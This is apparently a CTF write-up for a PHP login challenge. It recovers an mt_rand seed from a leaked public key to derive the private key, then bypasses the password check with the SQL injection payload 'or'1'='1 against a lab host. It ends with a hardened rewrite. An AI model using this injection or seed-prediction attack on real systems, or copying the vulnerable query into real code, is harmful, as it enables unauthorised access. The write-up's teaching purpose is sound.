Preface
Keywords: [php_mt_seed]
Solution
Typed www.zip on a whim and got the source leak.
Source code
<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if (isset($_POST['login'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$Private_key = $_POST['Private_key'];
if (($username == '') || ($password == '') || ($Private_key == '')) {
// If any field is empty, treat it as not filled in: show an error and return to the login page after 3 seconds
header('refresh:2; url=login.html');
echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
exit;
} else if ($Private_key != '*************') {
header('refresh:2; url=login.html');
echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
exit;
} else {
if ($Private_key === '************') {
$getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'" . ';';
$link = mysql_connect("localhost", "root", "root");
mysql_select_db("test", $link);
$result = mysql_query($getuser);
while ($row = mysql_fetch_assoc($result)) {
echo "<tr><td>" . $row["username"] . "</td><td>" . $row["flag"] . "</td><td>";
}
}
}
}
// generate public_key
function public_key($length = 16)
{
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ($i = 0; $i < $length; $i++)
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
return $public_key;
}
// generate private_key
function private_key($length = 12)
{
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ($i = 0; $i < $length; $i++)
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
return $private_key;
}
// mt_rand() is never seeded explicitly, so PHP seeds it once per request and
// public_key() consumes the first 16 outputs of that single stream
$Public_key = public_key();
//$Public_key = KVQP0LdJKRaV3n9D how to get crispr's private_key???
The comment at the end gives the public key and asks for the private key. Because the generator is never reseeded, both keys come from one mt_rand() stream, so the first step is to brute-force the seed from the public key with php_mt_seed.
The seed comes out; let's verify it.
<?php
// Seed recovered by php_mt_seed from the leaked public key KVQP0LdJKRaV3n9D.
// Run this under PHP 5.2.1 - 7.0 (the author used 5.2.17): PHP 7.1 changed
// mt_rand(), so the same seed produces a different sequence there.
mt_srand(1775196155);
function public_key($length = 16)
{
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = '';
for ($i = 0; $i < $length; $i++)
$public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
return $public_key;
}
function private_key($length = 12)
{
$strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$private_key = '';
for ($i = 0; $i < $length; $i++)
$private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
return $private_key;
}
// Same order as the original program: the first 16 outputs after seeding are
// the public key, the next 12 are the private key.
echo "public_key:  " . public_key() . "\n"; // should print KVQP0LdJKRaV3n9D
echo "private_key: " . private_key() . "\n";
Under PHP 5.2.17 the public key is reproduced, so the seed is correct.
The private key generated next is:
XuNhoueCDCGc
From PHP 5 onward the generator's state moves on with every mt_rand() call, so you must follow the program's own order: set the recovered seed, generate the public key first, then the private key. Generating the private key straight away gives the wrong value.
Then a quick SQL injection through the password field, and it's done:
http://7f12c5f3-f664-43fb-9cee-48361320f1d1.node4.buuoj.cn:81/login.php
POST:
Private_key=XuNhoueCDCGc&login=登录&password='or'1'='1&username=123
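As an added defensive counterpart (not the challenge's or the author's code), this is how the leaked login.php looks with both weaknesses removed: random_int() replaces the seed-replayable mt_rand() stream that php_mt_seed recovered, and a prepared statement replaces the interpolated password that the 'or'1'='1 payload abused. It assumes PHP 7 or later and mysqli with mysqlnd (for get_result()); the function names follow the page's.

```php
<?php
// Added example, not the challenge's code: hardened key generation and login check.

// Same alphabet as the original public_key()/private_key().
const KEY_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

function secure_key(int $length): string
{
    $key = '';
    $last = strlen(KEY_ALPHABET) - 1;
    for ($i = 0; $i < $length; $i++) {
        // random_int() draws from the OS CSPRNG: there is no seed to brute-force,
        // and knowing the public key reveals nothing about the private key.
        $key .= KEY_ALPHABET[random_int(0, $last)];
    }
    return $key;
}

function public_key(int $length = 16): string { return secure_key($length); }
function private_key(int $length = 12): string { return secure_key($length); }

// Constant-time comparison of the submitted key against the stored one,
// instead of the original != / === string checks.
function private_key_matches(string $submitted, string $expected): bool
{
    return hash_equals($expected, $submitted);
}

// The password is bound as a parameter, so it is compared as data and never
// parsed as SQL: the payload 'or'1'='1 is just a string that does not match.
function fetch_flag(mysqli $link, string $username, string $password): ?string
{
    $stmt = $link->prepare('SELECT flag FROM user WHERE username = ? AND password = ?');
    $stmt->bind_param('ss', $username, $password);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // get_result() needs mysqlnd (assumption)
    return $row['flag'] ?? null;
}

// Request handling, mirroring the original flow with the hardened helpers.
if (isset($_POST['login'])) {
    $username = $_POST['username'] ?? '';
    $password = $_POST['password'] ?? '';
    $submitted = $_POST['Private_key'] ?? '';
    $stored = '************'; // placeholder for the server-side private key
    if ($username === '' || $password === '' || $submitted === '') {
        exit('All fields are required.');
    }
    if (!private_key_matches($submitted, $stored)) {
        exit('Invalid private key.');
    }
    $link = new mysqli('localhost', 'root', 'root', 'test');
    echo htmlspecialchars((string) fetch_flag($link, $username, $password));
}
```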